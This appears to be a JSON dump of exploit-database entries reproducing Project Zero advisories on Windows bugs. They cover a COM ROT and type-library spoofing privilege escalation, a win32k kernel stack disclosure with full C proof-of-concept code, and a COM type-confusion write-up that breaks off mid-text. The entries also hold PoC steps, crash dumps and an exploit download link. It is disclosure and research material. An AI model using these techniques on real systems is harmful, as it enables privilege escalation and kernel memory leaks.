\r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. 
However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. 
File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. 
If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no way of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. 
This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- 
combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 
00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T04:59:07", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - win32k!xxxClientLpkDrawTextEx Stack Memory Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0245"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27775", "href": "https://0day.today/exploit/description/27775", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1182\r\n \r\nWe have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested) indirectly through the win32k!NtUserCreateWindowEx system call. 
The analysis shown below was performed on Windows 7 32-bit.\r\n \r\nThe full stack trace of where uninitialized kernel stack data is leaked to user-mode is as follows:\r\n \r\n--- cut ---\r\n8a993e28 82ab667d nt!memcpy+0x35\r\n8a993e84 92c50063 nt!KeUserModeCallback+0xc6\r\n8a994188 92c5f436 win32k!xxxClientLpkDrawTextEx+0x16b\r\n8a9941f4 92c5f72e win32k!DT_GetExtentMinusPrefixes+0x91\r\n8a994230 92c5f814 win32k!NeedsEndEllipsis+0x3d\r\n8a99437c 92c5fa0f win32k!AddEllipsisAndDrawLine+0x56\r\n8a994404 92c5fa9b win32k!DrawTextExWorker+0x140\r\n8a994428 92bb8c65 win32k!DrawTextExW+0x1e\r\n8a9946f0 92b23702 win32k!xxxDrawCaptionTemp+0x54d\r\n8a994778 92b78ce8 win32k!xxxDrawCaptionBar+0x682\r\n8a99479c 92b8067f win32k!xxxDWP_DoNCActivate+0xd6\r\n8a994818 92b59c8d win32k!xxxRealDefWindowProc+0x7fe\r\n8a99483c 92b86c1c win32k!xxxDefWindowProc+0x10f\r\n8a994874 92b8c156 win32k!xxxSendMessageToClient+0x11b\r\n8a9948c0 92b8c205 win32k!xxxSendMessageTimeout+0x1cf\r\n8a9948e8 92b719b5 win32k!xxxSendMessage+0x28\r\n8a994960 92b4284b win32k!xxxActivateThisWindow+0x473\r\n8a9949c8 92b42431 win32k!xxxSetForegroundWindow2+0x3dd\r\n8a994a08 92b714c7 win32k!xxxSetForegroundWindow+0x1e4\r\n8a994a34 92b712d7 win32k!xxxActivateWindow+0x1b3\r\n8a994a48 92b70cd6 win32k!xxxSwpActivate+0x44\r\n8a994aa8 92b70f83 win32k!xxxEndDeferWindowPosEx+0x2b5\r\n8a994ac8 92b7504f win32k!xxxSetWindowPos+0xf6\r\n8a994b04 92b6f6dc win32k!xxxShowWindow+0x25a\r\n8a994c30 92b72da9 win32k!xxxCreateWindowEx+0x137b\r\n8a994cf0 82876db6 win32k!NtUserCreateWindowEx+0x2a8\r\n8a994cf0 77486c74 nt!KiSystemServicePostCall\r\n0022f9f8 770deb5c ntdll!KiFastSystemCallRet\r\n0022f9fc 770deaf0 USER32!NtUserCreateWindowEx+0xc\r\n0022fca0 770dec1c USER32!VerNtUserCreateWindowEx+0x1a3\r\n0022fd4c 770dec77 USER32!_CreateWindowEx+0x201\r\n0022fd88 004146a5 USER32!CreateWindowExW+0x33\r\n--- cut ---\r\n \r\nThe win32k!xxxClientLpkDrawTextEx function invokes a user-mode callback #69 (corresponding to 
user32!__ClientLpkDrawTextEx), and passes in an input structure of 0x98 bytes. We have found that 4 bytes at offset 0x64 of that structure are uninitialized. These bytes come from offset 0x2C of a smaller structure of size 0x3C, which is passed to win32k!xxxClientLpkDrawTextEx through the 8th parameter. We have tracked that this smaller structure originates from the stack frame of the win32k!DrawTextExWorker function, and is passed down to win32k!DT_InitDrawTextInfo in the 4th argument.\r\n \r\nThe uninitialized data can be obtained by a user-mode application by hooking the appropriate entry in the user32.dll callback dispatch table, and reading data from a pointer provided through the handler's parameter. This technique is illustrated by the attached proof-of-concept code (again, specific to Windows 7 32-bit). During a few quick attempts, we have been unable to control the leaked bytes with stack spraying techniques, or to get them to contain any meaningful values for the purpose of vulnerability demonstration. However, if we attach a WinDbg debugger to the tested system, we can set a breakpoint at the beginning of win32k!DrawTextExWorker, manually overwrite the 4 bytes in question to a controlled DWORD right after the stack frame allocation instructions, and then observe these bytes in the output of the PoC program, which indicates they were not initialized anywhere during execution between win32k!DrawTextExWorker and nt!KeUserModeCallback(), and copied in the leftover form to user-mode. 
See below:\r\n \r\n--- cut ---\r\n2: kd> ba e 1 win32k!DrawTextExWorker\r\n2: kd> g\r\nBreakpoint 0 hit\r\nwin32k!DrawTextExWorker:\r\n8122f8cf 8bff mov edi,edi\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x2:\r\n8122f8d1 55 push ebp\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x3:\r\n8122f8d2 8bec mov ebp,esp\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x5:\r\n8122f8d4 8b450c mov eax,dword ptr [ebp+0Ch]\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x8:\r\n8122f8d7 83ec58 sub esp,58h\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0xb:\r\n8122f8da 53 push ebx\r\n3: kd> ed ebp-2c cccccccc\r\n3: kd> g\r\nBreakpoint 0 hit\r\nwin32k!DrawTextExWorker:\r\n8122f8cf 8bff mov edi,edi\r\n3: kd> g\r\n--- cut ---\r\n \r\nHere, a 32-bit value at EBP-0x2C is overwritten with 0xCCCCCCCC. This is the address of the uninitialized memory, since it is located at offset 0x2C of a structure placed at EBP-0x58; EBP-0x58+0x2C = EBP-0x2C. After executing the above commands, the program should print output similar to the following:\r\n \r\n--- cut ---\r\n00000000: 98 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00 ................\r\n00000010: 7c 00 00 00 00 00 00 00 14 00 16 00 80 00 00 00 |...............\r\n00000020: a4 02 01 0e 00 00 00 00 00 00 00 00 0a 00 00 00 ................\r\n00000030: 00 00 00 00 24 88 00 00 18 00 00 00 04 00 00 00 ....$...........\r\n00000040: 36 00 00 00 16 00 00 00 30 00 00 00 01 00 00 00 6.......0.......\r\n00000050: 01 00 00 00 0d 00 00 00 1e 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00[cc cc cc cc]00 00 00 00 04 00 00 00 ................\r\n00000070: ff ff ff ff 01 00 00 00 ff ff ff ff 1c 00 00 00 ................\r\n00000080: 54 00 65 00 73 00 74 00 57 00 69 00 6e 00 64 00 T.e.s.t.W.i.n.d.\r\n00000090: 6f 00 77 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 
o.w.............\r\n--- cut ---\r\n \r\nIt's clearly visible that bytes at offsets 0x64-0x67 are equal to the data we set in the prologue of win32k!DrawTextExWorker, which illustrates how uninitialized stack data is leaked to user-mode.\r\n \r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n*/\r\n \r\n#include <Windows.h>\r\n#include <cstdio>\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\r\n \r\nPVOID *GetUser32DispatchTable() {\r\n __asm{\r\n mov eax, fs:30h\r\n mov eax, [eax+0x2c]\r\n }\r\n}\r\n \r\nBOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler) {\r\n PVOID *DispatchTable = GetUser32DispatchTable();\r\n DWORD OldProtect;\r\n \r\n if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {\r\n printf(\"VirtualProtect#1 failed, %d\\n\", GetLastError());\r\n return FALSE;\r\n }\r\n \r\n DispatchTable[Index] = lpNewHandler;\r\n \r\n if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {\r\n printf(\"VirtualProtect#2 failed, %d\\n\", GetLastError());\r\n return FALSE;\r\n }\r\n \r\n return TRUE;\r\n}\r\n \r\nVOID ClientLpkDrawTextExHook(LPVOID Data) {\r\n printf(\"----------\\n\");\r\n PrintHex((PBYTE)Data, 0x98);\r\n}\r\n \r\nint main() {\r\n if (!HookUser32DispatchFunction(69, ClientLpkDrawTextExHook)) {\r\n return 1;\r\n }\r\n \r\n HWND hwnd = CreateWindowW(L\"BUTTON\", L\"TestWindow\", WS_OVERLAPPEDWINDOW | 
WS_VISIBLE,\r\n CW_USEDEFAULT, CW_USEDEFAULT, 100, 100, NULL, NULL, 0, 0);\r\n DestroyWindow(hwnd);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/27775", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-02-21T15:35:29", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27798", "href": "https://0day.today/exploit/description/27798", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107\r\n \r\nWindows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.\r\n \r\nDescription:\r\n \r\nQuerying for an IID on an OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n \r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures which is an entire OBJREF. 
The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers, some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n \r\nThe bug lies in the implementation of unpacking the results of the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until received by the caller (through a void** obviously). \r\n \r\nIf the IID in the OBJREF doesn\u2019t match the IID requested the caller doesn\u2019t know, if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to an object local to the caller, this will result in returning the local object itself which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n \r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. 
This could be a more privileged user (such as a sandbox broker), or a privileged service. This is a pretty easy pattern to find, any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n \r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either trigger CFG on modern systems or would require a very precise lineup of expected method and actual called method which could be tricky to exploit reliably. However I think at least using this to escape a sandbox it might be your only option. So I\u2019m not going to do that, instead I\u2019m going to exploit it logically, the only problem is this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n \r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will look up the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. 
If there is the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n \r\nThe trick here is while in general we don\u2019t control the location of the